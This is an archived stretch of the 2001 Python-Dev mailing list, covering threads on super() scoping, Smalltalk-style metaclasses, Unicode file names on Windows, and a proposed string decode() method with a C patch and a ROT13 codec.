References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik at effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You can't ask the instance for it
since its value is different depending on which class it is needed in.  Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

won't.  Now, don't go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__bases__[0].__repr__(self)

will do you any good either ;) Because it won't!
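Python 3 (PEP 3135) ended up treating super as exactly this kind of lexically scoped thing. When a method body uses `super()` or `__class__`, the compiler gives it a hidden `__class__` cell bound to the class whose body contains the `def`, so the lookup no longer depends on `type(self)`. A small sketch; the `sub` class and `defining_class` method are illustrative names:

```python
class bar:
    def __repr__(self):
        return "bar"


class foo(bar):
    def __repr__(self):
        # Zero-argument super() behaves like super(__class__, self), and
        # __class__ is fixed to foo at compile time, whatever type(self) is.
        return "foo/" + super().__repr__()

    def defining_class(self):
        return __class__


class sub(foo):
    pass
```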

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Wed May  2 19:02:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
             <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm at hypernet.com  Wed May  2 18:01:20 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you want 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of Smalltalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik at effbot.org  Wed May  2 17:47:08 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You cant ask the instance for it
> since it's value is different depending on in which it is needed

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal at lemburg.com  Wed May  2 18:11:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 19:17:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
             <00a901c0d31f$2797a370$e46940d5@hagrid> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>  
            <00a901c0d31f$2797a370$e46940d5@hagrid> 
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.
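That split is still visible in Python 3: a frame exposes its code object as `f_code`, and the code object carries the function's name, but the frame has no reference back to the function object itself. A small sketch; `caller_name` and `spam` are hypothetical, and `sys._getframe` is documented as a CPython implementation detail.

```python
import sys


def caller_name():
    # Frame 0 is caller_name itself; frame 1 is whoever called it.
    frame = sys._getframe(1)
    # Only the code object is reachable, so we get a name, not the function.
    return frame.f_code.co_name


def spam():
    return caller_name()
```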

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:13:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in the form of codecs...

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:18:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
             <3AF04E3D.45AE4F4B@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> 
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:32:46 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some examples of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.
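For comparison, this is roughly how the first two round trips look in Python 3. There, bytes-to-bytes transforms such as base64 and zlib are reached through `codecs.encode()` and `codecs.decode()` rather than through string methods. The gzip, gif, jpeg, wav, and mp3 codecs in the examples above are hypothetical; `zlib` stands in for gzip here.

```python
import codecs

binarydata = b"hello"

# Content-transfer encoding: bytes -> base64 bytes -> bytes.
xmltext = codecs.encode(binarydata, "base64")
roundtrip = codecs.decode(xmltext, "base64")

# Compression codec: zlib plays the role of the 'gzip' example.
data = b"spam " * 100
zzz = codecs.encode(data, "zlib")
restored = codecs.decode(zzz, "zlib")
```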

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:38:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
             <3AF052CE.E928BDA1@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
            <3AF052CE.E928BDA1@lemburg.com> 
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some example of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Wed May  2 20:20:24 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]
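A simplified sketch of why keeping `prefix` matters. It assumes PTH files are discovered by listing each entry of `sitedirs`. The real site.py also adds the directories to sys.path and processes each PTH file's contents. `makepath` is re-created here as a stand-in, and `candidate_sitedirs` and `pth_files` are hypothetical helpers.

```python
import os


def makepath(*parts):
    # Stand-in for site.py's helper: join, make absolute, normalize case.
    return os.path.normcase(os.path.abspath(os.path.join(*parts)))


def candidate_sitedirs(prefix):
    # The suggested fix: keep prefix itself *and* add lib/site-packages.
    return [prefix, makepath(prefix, "lib", "site-packages")]


def pth_files(sitedirs):
    # Collect the .pth files that would be found in each existing sitedir.
    found = []
    for sitedir in sitedirs:
        if not os.path.isdir(sitedir):
            continue
        for name in sorted(os.listdir(sitedir)):
            if name.endswith(".pth"):
                found.append(os.path.join(sitedir, name))
    return found
```

With only the site-packages entry, a PTH file sitting directly under `prefix` is never seen. Listing both directories keeps old and new locations working.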

Cheers /F


From mal at lemburg.com  Wed May  2 21:55:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some example of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
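A sketch of that registry route in Python 3 terms. `codecs.lookup()` returns a `CodecInfo` whose `decode` function returns a pair: the output and the number of input items consumed. `codecs.getencoder()` fetches the stateless encoder directly.

```python
import codecs

info = codecs.lookup("base64")
decoded, consumed = info.decode(b"aGVsbG8=\n")

# The stateless encoder can also be fetched on its own.
encoder = codecs.getencoder("base64")
encoded, _ = encoder(b"hello")
```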
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that decoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif

From mal at lemburg.com  Wed May  2 22:36:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
		            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and its own inverse). The
main difference over the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vgf bja vairefr). Gur
znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""
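A minimal sketch of a string-to-string ROT13 codec registered through the codec registry in Python 3. It assumes a hypothetical codec name, `rot13_demo`, and does not reproduce the attached rot_13.py. Python 3 also ships its own `rot_13` codec, which the check compares against. Because ROT13 is its own inverse, one function serves as both encoder and decoder.

```python
import codecs

_LOWER = "abcdefghijklmnopqrstuvwxyz"
_UPPER = _LOWER.upper()
# Map each letter to the one 13 places further on; other characters pass through.
_TABLE = str.maketrans(_LOWER + _UPPER,
                       _LOWER[13:] + _LOWER[:13] + _UPPER[13:] + _UPPER[:13])


def rot13_encode(text, errors="strict"):
    # Codec functions return (output, number of input items consumed).
    return text.translate(_TABLE), len(text)


rot13_decode = rot13_encode  # applying ROT13 twice gives back the input


def _search(name):
    if name == "rot13_demo":
        return codecs.CodecInfo(encode=rot13_encode, decode=rot13_decode,
                                name="rot13_demo")
    return None


codecs.register(_search)
```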

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: rot_13.py
Type: text/python
Size: 2066 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010502/9cbfa6dd/attachment.bin>

From guido at digicool.com  Thu May  3 00:11:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
             <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>  
            <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hierarchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
>                       Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass.  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dictionaries.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supporting specialized
> class methods.
> 
> =============================

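Jim's class-creation sequence (first create the metaclass as a subclass of the superclass's metaclass, then create the class as an instance of that new metaclass) can be mimicked in modern Python 3, where `type` plays the part of MetaClass. This is only a sketch under stated assumptions: `make_subclass`, `_unit` and the `*MetaClass` naming are hypothetical, and Python does not create a metaclass per class automatically the way Smalltalk-80 does.

```python
def make_subclass(name, base, instance_methods=None, class_methods=None):
    """Create `name` as a subclass of `base`, Smalltalk-80 style (hypothetical helper)."""
    # Step 1: the new metaclass subclasses the base class's metaclass,
    # so class-side methods are inherited along the parallel hierarchy.
    meta = type(name + "MetaClass", (type(base),), dict(class_methods or {}))
    # Step 2: the new class is an *instance* of the metaclass just created.
    return meta(name, (base,), dict(instance_methods or {}))


def _init(self, width, height):
    self.width, self.height = width, height


def _area(self):
    # An instance-side method: it lives in the class's own dict.
    return self.width * self.height


def _unit(cls):
    # A class-side method: it lives in the metaclass's dict, not the class's.
    return cls(1, 1)


Rectangle = make_subclass("Rectangle", object,
                          {"__init__": _init, "area": _area},
                          {"unit": _unit})
SpamRectangle = make_subclass("SpamRectangle", Rectangle)
```

Here `unit` is reachable from `SpamRectangle` (it is found in `RectangleMetaClass` through the metaclass hierarchy) but not from `SpamRectangle` instances, mirroring the instance-method/class-method split described above.
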
--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May  2 23:24:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
